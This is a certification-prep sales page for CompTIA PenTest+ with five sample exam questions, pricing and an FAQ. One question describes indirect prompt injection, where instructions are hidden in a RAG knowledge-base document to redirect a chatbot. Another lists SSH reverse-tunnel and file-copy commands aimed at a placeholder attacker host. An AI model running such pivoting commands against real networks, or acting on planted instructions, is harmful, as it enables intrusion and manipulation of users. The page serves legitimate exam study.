CertCrush
Back to home
Free Sample

Try CompTIA Pentest+

Get a taste before you commit — no account needed. Then a free account unlocks 25 questions with readiness tracking, no card required.

Get full access to CompTIA Pentest+

All questions, timed exams, flashcards, PDF study guide download & progress tracking.

This course

$9.99

one-time

Buy Course

Monthly

$12.99

per month · all courses

Monthly Plan
Best value

Annual

$79.99

Save 49% · all courses

Annual Plan

Takes 30 seconds — create a free account, then straight to checkout. Already have an account? Sign in

CompTIA · Exam reference

About the CompTIA Pentest+ exam

CompTIA PenTest+ is an intermediate cybersecurity certification that validates your ability to plan, scope, and execute penetration tests against networks, web applications, cloud environments, and AI systems.

10

Sample questions

165 min

Exam time limit

70%

Passing score

Exam Domains Covered

Engagement Management · 13%Reconnaissance and Enumeration · 21%Vulnerability Discovery and Analysis · 17%Attacks and Exploits · 35%Post-Exploitation and Lateral Movement · 14%

Sample Practice Questions

The following questions are a preview of the type of syllabus-aligned questions you will practise in CertCrush. They reflect the format and reasoning style of the CompTIA Pentest+ exam — not actual exam content.

Q1.During a penetration test, a junior tester on the team accidentally runs a denial-of-service attack against a production system that was explicitly listed as off-limits in the Rules of Engagement. The system experiences a brief outage before the attack is stopped. Which of the following BEST describes the potential consequences of this action? (Select TWO)

  • A.The testing firm may face legal liability for unauthorized access to a system outside the agreed scope
  • B.The junior tester will automatically lose their penetration testing certification
  • C.The testing firm may be in breach of contract, potentially resulting in termination of the engagement and financial penalties
  • D.The client is required to file a police report for any ROE violation
  • E.The engagement results are automatically invalidated and cannot be used

Domain: Engagement Management

Q2.A penetration tester runs the following Nmap command and receives the output shown below. Based on this output, which of the following conclusions is MOST accurate? Command: nmap -sV -O -p 21,22,80,443,445,3389 192.168.1.100 Output: PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.4 80/tcp open http Apache httpd 2.4.29 443/tcp closed https 445/tcp open microsoft-ds Windows Server 2016 3389/tcp open ms-wbt-server Microsoft Terminal Services OS: Windows Server 2016

  • A.The host is a standard Windows server with typical services and no anomalies
  • B.The host is running Windows Server 2016 with an unusual configuration: vsftpd is a Linux FTP server running on a Windows host, which may indicate a containerized service or misconfiguration worth investigating
  • C.HTTPS being closed means the server has no web presence
  • D.The presence of both SSH and RDP means the system is dual-booted with Linux and Windows

Domain: Reconnaissance and Enumeration

Q3.A penetration tester is assessing an AI-powered customer service chatbot that uses Retrieval-Augmented Generation (RAG) to answer questions from a knowledge base. The tester embeds malicious instructions in a document that gets indexed into the knowledge base. When users interact with the chatbot, it follows the attacker's embedded instructions. What type of attack is this?

  • A.Direct prompt injection, because the attacker directly interacts with the chatbot
  • B.Indirect prompt injection, because malicious instructions are placed in external data sources that the LLM processes during retrieval
  • C.Data poisoning, because the training data was corrupted
  • D.Adversarial input attack, because the attacker crafted specific inputs to fool the model

Domain: Attacks and Exploits

Q4.A penetration tester has compromised a server in a DMZ that cannot make outbound connections to the attacker's machine. However, the attacker can SSH to the compromised server. The tester needs to access an internal service on port 22 of 10.0.0.50 from the compromised server. Which SSH tunnel command should the tester run from the compromised server?

  • A.ssh -R 9090:10.0.0.50:22 attacker@attacker_ip, creating a reverse tunnel so the attacker can reach the internal service through localhost:9090
  • B.ssh -L 9090:10.0.0.50:22 attacker@attacker_ip, creating a local forward on the compromised server
  • C.ssh -D 9090 attacker@attacker_ip, creating a dynamic SOCKS proxy for all internal traffic
  • D.scp -r 10.0.0.50:/etc/ attacker@attacker_ip:/tmp/, copying files directly through the SSH session

Domain: Post-Exploitation and Lateral Movement

Q5.A penetration tester discovers three individual findings during an assessment: a low-severity information disclosure that reveals internal IP addresses, a medium-severity SSRF vulnerability, and a low-severity default credential on an internal service. Individually, none are critical. How should the tester present these in the report?

  • A.Present them as a vulnerability chain showing how the information disclosure enables SSRF targeting of internal services where default credentials grant unauthorized access, resulting in a critical combined impact
  • B.Report each finding independently at its individual severity level without mentioning relationships between them
  • C.Omit the two low-severity findings from the report and only include the medium-severity SSRF
  • D.Average the three CVSS scores to calculate a combined severity rating

Domain: Vulnerability Discovery and Analysis

Frequently Asked Questions

What is included in the free CompTIA Pentest+ sample?

The free sample includes 10 syllabus-aligned practice questions, sample flashcards, and a preview chapter from the study guide. No account or payment is required to try the sample.

How many questions are in the full CompTIA Pentest+ course?

The full course includes a comprehensive question bank covering all exam domains. You can see the total question count on the CompTIA Pentest+ course page.

Are these official CompTIA exam questions?

No. CertCrush questions are independently written and syllabus-aligned — they mirror the format, difficulty, and reasoning style of the official exam. We are not affiliated with or endorsed by CompTIA.

Which domains does the CompTIA Pentest+ course cover?

The course covers 5 exam domains: Engagement Management, Reconnaissance and Enumeration, Vulnerability Discovery and Analysis, Attacks and Exploits, Post-Exploitation and Lateral Movement.

Can I study on mobile?

Yes. CertCrush is fully responsive and works on phones, tablets, and desktops. The timed exam, flashcards, and study guide all work on mobile without installing an app.

What happens when I create an account?

Creating a free account lets you access full courses, track your weak areas by domain, and resume practice sessions across devices. No credit card is required to register.